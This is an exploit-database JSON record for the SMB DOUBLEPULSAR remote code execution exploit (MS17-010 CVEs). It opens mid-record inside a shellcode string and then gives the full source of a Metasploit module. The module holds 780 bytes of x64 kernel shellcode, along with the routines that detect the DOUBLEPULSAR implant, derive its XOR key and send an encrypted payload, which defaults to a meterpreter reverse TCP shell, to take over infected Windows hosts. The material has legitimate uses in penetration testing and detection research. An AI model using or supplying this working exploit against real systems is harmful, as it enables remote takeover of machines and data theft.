make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T13:26:14", "differentElements": ["title"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "14a588c63a2209707b7e878a25fbd043", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-01T16:39:33", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-02-05T00:47:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-02-05T00:47:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n 